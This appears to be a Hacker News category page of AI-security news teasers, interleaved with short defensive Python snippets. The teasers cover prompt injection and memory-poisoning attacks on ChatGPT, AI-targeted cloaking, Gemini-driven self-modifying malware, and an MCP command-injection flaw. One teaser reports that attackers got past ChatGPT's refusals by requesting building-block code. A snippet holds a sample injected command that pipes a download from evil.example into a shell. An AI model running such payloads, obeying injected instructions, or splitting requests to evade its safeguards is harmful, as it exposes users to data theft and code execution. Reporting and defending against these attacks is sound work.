
artificial intelligence | Breaking Cybersecurity News | The Hacker News

Category — artificial intelligence
Google Uncovers PROMPTFLUX Malware That Uses Gemini AI to Rewrite Its Code Hourly

Nov 05, 2025 Artificial Intelligence / Threat Intelligence
Google on Wednesday said it discovered an unknown threat actor using an experimental Visual Basic Script (VBScript) malware dubbed PROMPTFLUX that interacts with its Gemini artificial intelligence (AI) model API to write its own source code for improved obfuscation and evasion. "PROMPTFLUX is written in VBScript and interacts with Gemini's API to request specific VBScript obfuscation and evasion techniques to facilitate 'just-in-time' self-modification, likely to evade static signature-based detection," Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News. The novel feature is part of its "Thinking Robot" component, which periodically queries the large language model (LLM), Gemini 1.5 Flash or later in this case, to obtain new code so as to sidestep detection. This, in turn, is accomplished by using a hard-coded API key to send the query to the Gemini API endpoint. The prompt sent to the model is both highly specif...
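One practical takeaway from PROMPTFLUX's design is that the hard-coded API key is a static artifact defenders can hunt for. As a minimal, hypothetical sketch (in Python rather than the malware's VBScript), a scanner for embedded Google-style API keys, which conventionally begin with the `AIza` prefix; the pattern is a heuristic, not an authoritative validator:

```python
import re

# Heuristic pattern for Google Cloud API keys (Gemini keys included):
# the literal prefix "AIza" followed by 35 URL-safe characters.
GOOGLE_API_KEY = re.compile(r"AIza[0-9A-Za-z_-]{35}")

def find_hardcoded_keys(script_text: str) -> list[str]:
    """Return substrings that look like embedded Google API keys."""
    return GOOGLE_API_KEY.findall(script_text)

# Example: a fabricated key embedded in a script body.
sample = 'apiKey = "AIza' + "B" * 35 + '"'
print(find_hardcoded_keys(sample))
```

A rule like this pairs naturally with a check for script files that also contain an LLM API hostname, which narrows matches to the self-modification pattern GTIG describes.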
Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Nov 05, 2025 Artificial Intelligence / Vulnerability
Cybersecurity researchers have disclosed a new set of vulnerabilities impacting OpenAI's ChatGPT artificial intelligence (AI) chatbot that could be exploited by an attacker to steal personal information from users' memories and chat histories without their knowledge. The seven vulnerabilities and attack techniques, according to Tenable, were found in OpenAI's GPT-4o and GPT-5 models. OpenAI has since addressed some of them. These issues expose the AI system to indirect prompt injection attacks, allowing an attacker to manipulate the expected behavior of a large language model (LLM) and trick it into performing unintended or malicious actions, security researchers Moshe Bernstein and Liv Matan said in a report shared with The Hacker News. The identified shortcomings are listed below - Indirect prompt injection vulnerability via trusted sites in Browsing Context, which involves asking ChatGPT to summarize the contents of web pages with malicious instructions added...
Google's AI 'Big Sleep' Finds 5 New Vulnerabilities in Apple's Safari WebKit

Nov 04, 2025 Artificial Intelligence / Vulnerability
Google's artificial intelligence (AI)-powered cybersecurity agent called Big Sleep has been credited by Apple for discovering as many as five different security flaws in the WebKit component used in its Safari web browser that, if successfully exploited, could result in a browser crash or memory corruption. The list of vulnerabilities is as follows -
CVE-2025-43429 - A buffer overflow vulnerability that may lead to an unexpected process crash when processing maliciously crafted web content (addressed through improved bounds checking)
CVE-2025-43430 - An unspecified vulnerability that could result in an unexpected process crash when processing maliciously crafted web content (addressed through improved state management)
CVE-2025-43431 & CVE-2025-43433 - Two unspecified vulnerabilities that may lead to memory corruption when processing maliciously crafted web content (addressed through improved memory handling)
CVE-2025-43434 - A use-after-free vulnerability that may ...
2025 Cybersecurity Assessment Report: Navigating the New Reality

Bitdefender | Cybersecurity / Attack Surface
Insights from 1,200 security professionals reveal perception gaps, concealed breaches, and new concerns about AI-backed attacks.

Keeper Security recognized in the 2025 Gartner® Magic Quadrant™ for PAM

Keeper Security | Agentic AI / Identity Management
Access the full Magic Quadrant report and see how KeeperPAM compares to other leading PAM platforms.
OpenAI Unveils Aardvark: GPT-5 Agent That Finds and Fixes Code Flaws Automatically

Oct 31, 2025 Artificial Intelligence / Code Security
OpenAI has announced the launch of an "agentic security researcher" that's powered by its GPT-5 large language model (LLM) and is programmed to emulate a human expert capable of scanning, understanding, and patching code. The artificial intelligence (AI) company said the autonomous agent, called Aardvark, is designed to help developers and security teams flag and fix security vulnerabilities at scale. It's currently available in private beta. "Aardvark continuously analyzes source code repositories to identify vulnerabilities, assess exploitability, prioritize severity, and propose targeted patches," OpenAI noted. It works by embedding itself into the software development pipeline, monitoring commits and changes to codebases, detecting security issues and how they might be exploited, and proposing fixes to address them using LLM-based reasoning and tool-use. Powering the agent is GPT-5, which OpenAI introduced in August 2025. The company describes it...
Google's Built-In AI Defenses on Android Now Block 10 Billion Scam Messages a Month

Oct 30, 2025 Mobile Security / Artificial Intelligence
Google on Thursday revealed that the scam defenses built into Android safeguard users around the world from more than 10 billion suspected malicious calls and messages every month. The tech giant also said it has blocked over 100 million suspicious numbers from using Rich Communication Services (RCS), an evolution of the SMS protocol, thereby preventing scams before they could even be sent. In recent years, the company has adopted various safeguards to combat phone call scams and automatically filter known spam using on-device artificial intelligence, moving it to the "spam & blocked" folder in the Google Messages app for Android. Earlier this month, Google also globally rolled out safer links in Google Messages, warning users when they attempt to click on any URLs in a message flagged as spam and stopping them from visiting the potentially harmful website, unless the message is marked as "not spam." Google said its analysis of user-submitted rep...
New AI-Targeted Cloaking Attack Tricks AI Crawlers Into Citing Fake Info as Verified Facts

Oct 29, 2025 Machine Learning / AI Safety
Cybersecurity researchers have flagged a new security issue in agentic web browsers like OpenAI ChatGPT Atlas that exposes underlying artificial intelligence (AI) models to context poisoning attacks. In the attack devised by AI security company SPLX, a bad actor can set up websites that serve different content to browsers and AI crawlers run by ChatGPT and Perplexity. The technique has been codenamed AI-targeted cloaking. The approach is a variation of search engine cloaking, which refers to the practice of presenting one version of a web page to users and a different version to search engine crawlers with the end goal of manipulating search rankings. The only difference in this case is that attackers optimize for AI crawlers from various providers by means of a trivial user agent check that leads to content delivery manipulation. "Because these systems rely on direct retrieval, whatever content is served to them becomes ground truth in AI Overviews, summaries, or autonom...
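Because the cloaking hinges on a trivial user agent check, one way to surface it is to fetch the same URL as both a regular browser and an AI crawler, then compare what comes back. A minimal sketch of the comparison step (the user-agent strings are illustrative, and real pages also differ for benign reasons such as timestamps or ads, so a production check would normalize content or use a similarity threshold rather than an exact hash match):

```python
import hashlib

# Illustrative user-agent strings; actual crawler UAs vary by provider.
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
AI_CRAWLER_UA = "ExampleAIBot/1.0"

def likely_cloaked(browser_body: str, crawler_body: str) -> bool:
    """Flag potential AI-targeted cloaking: the page body served to a
    browser user agent differs from the body served to an AI crawler."""
    browser_digest = hashlib.sha256(browser_body.encode()).hexdigest()
    crawler_digest = hashlib.sha256(crawler_body.encode()).hexdigest()
    return browser_digest != crawler_digest
```

In practice the two bodies would come from two requests to the same URL, one sent with `BROWSER_UA` and one with `AI_CRAWLER_UA`.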
Discover Practical AI Tactics for GRC — Join the Free Expert Webinar

Oct 29, 2025 Artificial Intelligence / Compliance
Artificial Intelligence (AI) is rapidly transforming Governance, Risk, and Compliance (GRC). It's no longer a future concept—it's here, and it's already reshaping how teams operate. AI's capabilities are profound: it's speeding up audits, flagging critical risks faster, and drastically cutting down on time-consuming manual work. This leads to greater efficiency, higher accuracy, and a more proactive GRC function. However, this powerful shift introduces significant new challenges. AI brings its own set of risks, including potential bias, dangerous blind spots, and regulatory gaps that are only beginning to be addressed by governing bodies. Staying ahead of this curve—not just struggling to keep up—requires clear, practical knowledge. Don't Just Stay Afloat—Master the Change To help you navigate this complex landscape, we invite you to our free, high-impact webinar, "The Future of AI in GRC: Opportunities, Risks, and Practical Insights." This se...
Preparing for the Digital Battlefield of 2026: Ghost Identities, Poisoned Accounts, & AI Agent Havoc

Oct 29, 2025 Artificial Intelligence / Data Breach
BeyondTrust's annual cybersecurity predictions point to a year where old defenses will fail quietly, and new attack vectors will surge. Introduction The next major breach won't be a phished password. It will be the result of a massive, unmanaged identity debt. This debt takes many forms: it's the "ghost" identity from a 2015 breach lurking in your IAM, the privilege sprawl from thousands of new AI agents bloating your attack surface, or the automated account poisoning that exploits weak identity verification in financial systems. All of these vectors—physical, digital, new, and old—are converging on one single point of failure: identity. Based on analysis from BeyondTrust's cybersecurity experts, here are three critical identity-based threats that will define the coming year: 1. Agentic AI Emerges as the Ultimate Attack Vector By 2026, agentic AI will be connected to nearly every technology we operate, effectively becoming the new middleware for most organizations. ...
New ChatGPT Atlas Browser Exploit Lets Attackers Plant Persistent Hidden Commands

Oct 27, 2025 Artificial Intelligence / Vulnerability
Cybersecurity researchers have discovered a new vulnerability in OpenAI's ChatGPT Atlas web browser that could allow malicious actors to inject nefarious instructions into the artificial intelligence (AI)-powered assistant's memory and run arbitrary code. "This exploit can allow attackers to infect systems with malicious code, grant themselves access privileges, or deploy malware," LayerX Security Co-Founder and CEO, Or Eshed, said in a report shared with The Hacker News. The attack, at its core, leverages a cross-site request forgery (CSRF) flaw that could be exploited to inject malicious instructions into ChatGPT's persistent memory. The corrupted memory can then persist across devices and sessions, permitting an attacker to conduct various actions, including seizing control of a user's account, browser, or connected systems, when a logged-in user attempts to use ChatGPT for legitimate purposes. Memory, first introduced by OpenAI in February 2024, is...
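The CSRF element of the attack rests on a classic browser behavior: credentials (cookies) are attached to cross-origin requests automatically, so an attacker's page can trigger state-changing actions in the victim's session. As a generic, hypothetical illustration of the standard defense (not OpenAI's implementation), a server can require a token that is bound to the session and that a cross-site page cannot read or guess:

```python
import hmac

def issue_csrf_token(session_secret: bytes, session_id: str) -> str:
    """Derive a per-session CSRF token the server can later verify."""
    return hmac.new(session_secret, session_id.encode(), "sha256").hexdigest()

def is_request_allowed(session_secret: bytes, session_id: str,
                       submitted_token: str) -> bool:
    """A forged cross-site request carries the victim's cookies but not
    this token, so the server rejects it."""
    expected = issue_csrf_token(session_secret, session_id)
    return hmac.compare_digest(expected, submitted_token)
```

`hmac.compare_digest` is used instead of `==` to avoid leaking information through comparison timing.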
Secure AI at Scale and Speed — Learn the Framework in this Free Webinar

Oct 23, 2025 Artificial Intelligence / Data Protection
AI is everywhere—and your company wants in. Faster products, smarter systems, fewer bottlenecks. But if you're in security, that excitement often comes with a sinking feeling. Because while everyone else is racing ahead, you're left trying to manage a growing web of AI agents you didn't create, can't fully see, and weren't designed to control. Join our upcoming webinar and learn how to make AI security work with you, not against you. The Quiet Crisis No One Talks About Did you know most companies now have 100 AI agents for every one human employee? Even more shocking? 99% of those AI identities are completely unmanaged. No oversight. No lifecycle controls. And every one of them could be a backdoor waiting to happen. It's not your fault. Traditional tools weren't built for this new AI world. But the risks are real—and growing. Let's Change That. Together. In our free webinar, "Turning Controls into Accelerators of AI Adoption," we'll help you flip the script. Th...
Securing AI to Benefit from AI

Oct 21, 2025 Artificial Intelligence / Security Operations
Artificial intelligence (AI) holds tremendous promise for improving cyber defense and making the lives of security practitioners easier. It can help teams cut through alert fatigue, spot patterns faster, and bring a level of scale that human analysts alone can't match. But realizing that potential depends on securing the systems that make it possible. Every organization experimenting with AI in security operations is, knowingly or not, expanding its attack surface. Without clear governance, strong identity controls, and visibility into how AI makes its decisions, even well-intentioned deployments can create risk faster than they reduce it. To truly benefit from AI, defenders need to approach securing it with the same rigor they apply to any other critical system. That means establishing trust in the data it learns from, accountability for the actions it takes, and oversight for the outcomes it produces. When secured correctly, AI can amplify human capability instead of replacing it t...
Identity Security: Your First and Last Line of Defense

Oct 17, 2025 Artificial Intelligence / Identity Security
The danger isn't that AI agents have bad days — it's that they never do. They execute faithfully, even when what they're executing is a mistake. A single misstep in logic or access can turn flawless automation into a flawless catastrophe. This isn't some dystopian fantasy—it's Tuesday at the office now. We've entered a new phase where autonomous AI agents act with serious system privileges. They execute code, handle complex tasks, and access sensitive data with unprecedented autonomy. They don't sleep, don't ask questions, and don't always wait for permission. That's powerful. That's also risky. Because today's enterprise threats go way beyond your garden-variety phishing scams and malware. The modern security perimeter? It's all about identity management. Here's the million-dollar question every CISO should be asking: Who or what has access to your critical systems, can you secure and govern that access, and can you actually prove it? Ho...
Architectures, Risks, and Adoption: How to Assess and Choose the Right AI-SOC Platform

Oct 16, 2025 Artificial Intelligence / Data Privacy
Scaling the SOC with AI - Why now? Security Operations Centers (SOCs) are under unprecedented pressure. According to SACR's AI-SOC Market Landscape 2025, the average organization now faces around 960 alerts per day, while large enterprises manage more than 3,000 alerts daily from an average of 28 different tools. Nearly 40% of those alerts go uninvestigated, and 61% of security teams admit to overlooking alerts that later proved critical. The takeaway is clear: the traditional SOC model can't keep up. AI has now moved from experimentation to execution inside the SOC. 88% of organizations that don't yet run an AI-driven SOC plan to evaluate or deploy one within the next year. But as more vendors promote "AI-powered SOC automation," the challenge for security leaders has shifted from awareness to evaluation. The key question is no longer whether AI belongs in the SOC, but how to measure its real impact and select a platform that delivers value without introducing signi...
What AI Reveals About Web Applications—and Why It Matters

Oct 14, 2025 Artificial Intelligence / Web Security
Before an attacker ever sends a payload, they've already done the work of understanding how your environment is built. They look at your login flows, your JavaScript files, your error messages, your API documentation, your GitHub repos. These are all clues that help them understand how your systems behave. AI is significantly accelerating reconnaissance and enabling attackers to map your environment with greater speed and precision. While the narrative often paints AI as running the show, we're not seeing AI take over offensive operations end to end. AI is not autonomously writing exploits, chaining attacks, and breaching systems without the human in the loop. What it is doing is speeding up the early and middle stages of the attacker workflow: gathering information, enriching it, and generating plausible paths to execution.  Think of it like AI-generated writing; AI can produce a draft quickly given the right parameters, but someone still needs to review, refine, and tune it f...
The AI SOC Stack of 2026: What Sets Top-Tier Platforms Apart?

Oct 10, 2025 Artificial Intelligence / Threat Detection
The SOC of 2026 will no longer be a human-only battlefield. As organizations scale and threats evolve in sophistication and velocity, a new generation of AI-powered agents is reshaping how Security Operations Centers (SOCs) detect, respond, and adapt. But not all AI SOC platforms are created equal. From prompt-dependent copilots to autonomous, multi-agent systems, the current market offers everything from smart assistants to force-multiplying automation. While adoption is still early—estimated at 1–5% penetration, according to Gartner—the shift is undeniable. SOC teams must now ask a fundamental question: What type of AI belongs in my security stack? The Limits of Traditional SOC Automation Despite promises from legacy SOAR platforms and rule-based SIEM enhancements, many security leaders still face the same core challenges: Analyst alert fatigue from redundant low-fidelity triage tasks Manual context correlation across disparate tools and logs Disjointed and static detect...
From HealthKick to GOVERSHELL: The Evolution of UTA0388's Espionage Malware

Oct 09, 2025 Cyber Espionage / Artificial Intelligence
A China-aligned threat actor codenamed UTA0388 has been attributed to a series of spear-phishing campaigns targeting North America, Asia, and Europe that are designed to deliver a Go-based implant known as GOVERSHELL. "The initially observed campaigns were tailored to the targets, and the messages purported to be sent by senior researchers and analysts from legitimate-sounding, completely fabricated organizations," Volexity said in a Wednesday report. "The goal of these spear phishing campaigns was to socially engineer targets into clicking links that led to a remotely hosted archive containing a malicious payload." Since then, the threat actor behind the attacks is said to have leveraged different lures and fictional identities, spanning several languages, including English, Chinese, Japanese, French, and German. Early iterations of the campaigns have been found to embed links to phishing content either hosted on a cloud-based service or their own infrastruc...
ThreatsDay Bulletin: MS Teams Hack, MFA Hijacking, $2B Crypto Heist, Apple Siri Probe & More

Oct 09, 2025 Cybersecurity / Hacking News
Cyber threats are evolving faster than ever. Attackers now combine social engineering, AI-driven manipulation, and cloud exploitation to breach targets once considered secure. From communication platforms to connected devices, every system that enhances convenience also expands the attack surface. This edition of ThreatsDay Bulletin explores these converging risks and the safeguards that help preserve trust in an increasingly intelligent threat landscape. How Threat Actors Abuse Microsoft Teams Attackers Abuse Microsoft Teams for Extortion, Social Engineering, and Financial Theft Microsoft detailed the various ways threat actors can abuse its Teams chat software at various stages of the attack chain, even using it to support financial theft through extortion, social engineering, or technical means. "Octo Tempest has used communication apps, including Teams, to send taunting and threatening messages to organizations, defenders, and incident response teams as p...
From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Oct 09, 2025 Artificial Intelligence / Malware
Russian hackers' adoption of artificial intelligence (AI) in cyber attacks against Ukraine has reached a new level in the first half of 2025 (H1 2025), the country's State Service for Special Communications and Information Protection (SSSCIP) said. "Hackers now employ it not only to generate phishing messages, but some of the malware samples we have analyzed show clear signs of being generated with AI – and attackers are certainly not going to stop there," the agency said in a report published Wednesday. SSSCIP said 3,018 cyber incidents were recorded during the time period, up from 2,575 in the second half of 2024 (H2 2024). Local authorities and military entities witnessed an increase in attacks compared to H2 2024, while those targeting government and energy sectors declined. One notable attack observed involved UAC-0219's use of malware called WRECKSTEEL in attacks aimed at state administration bodies and critical infrastructure facilities in the country...
Severe Framelink Figma MCP Vulnerability Lets Hackers Execute Code Remotely

Oct 08, 2025 Vulnerability / Software Security
Cybersecurity researchers have disclosed details of a now-patched vulnerability in the popular figma-developer-mcp Model Context Protocol (MCP) server that could allow attackers to achieve code execution. The vulnerability, tracked as CVE-2025-53967 (CVSS score: 7.5), is a command injection bug stemming from the unsanitized use of user input, opening the door to a scenario where an attacker can send arbitrary system commands. "The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (|, >, &&, etc.)," according to a GitHub advisory for the flaw. "Successful exploitation can lead to remote code execution under the server process's privileges." Given that the Framelink Figma MCP server exposes various tools to perform operations in Figma using artificial intelligence (AI)-powered coding agents like Cursor, an attacker co...
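The advisory's description maps to a well-known anti-pattern: interpolating user input into a shell command string. A generic sketch (the `convert` command and filenames are illustrative, not the actual figma-developer-mcp code) contrasting the vulnerable string form with the safer argument-vector form that APIs like Python's `subprocess.run` accept:

```python
def build_command_unsafe(user_file: str) -> str:
    # VULNERABLE pattern: user input lands inside a shell command line,
    # so metacharacters like |, >, and && are interpreted by the shell.
    return f"convert {user_file} out.png"

def build_command_safe(user_file: str) -> list[str]:
    # Safer pattern: an argument vector (e.g. subprocess.run(argv)
    # without shell=True) passes the input as one literal argument.
    return ["convert", user_file, "out.png"]

payload = "in.png && curl evil.example | sh"
print(build_command_unsafe(payload))  # a shell would execute the injected tail
print(build_command_safe(payload))    # injected text stays a single argument
```

The argument-vector form bypasses the shell entirely, which is the fix pattern typically applied for this class of bug; input validation on top of it is still good hygiene.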
OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

Oct 08, 2025 Artificial Intelligence / Threat Intelligence
OpenAI on Tuesday said it disrupted three activity clusters for misusing its ChatGPT artificial intelligence (AI) tool to facilitate malware development. This includes a Russian-language threat actor, who is said to have used the chatbot to help develop and refine a remote access trojan (RAT) and a credential stealer, with an aim to evade detection. The operator also used several ChatGPT accounts to prototype and troubleshoot technical components that enable post-exploitation and credential theft. "These accounts appear to be affiliated with Russian-speaking criminal groups, as we observed them posting evidence of their activities in a Telegram channel dedicated to those actors," OpenAI said. The AI company said while its large language models (LLMs) refused the threat actor's direct requests to produce malicious content, they worked around the limitation by creating building-block code, which was then assembled to create the workflows. Some of the produced output invo...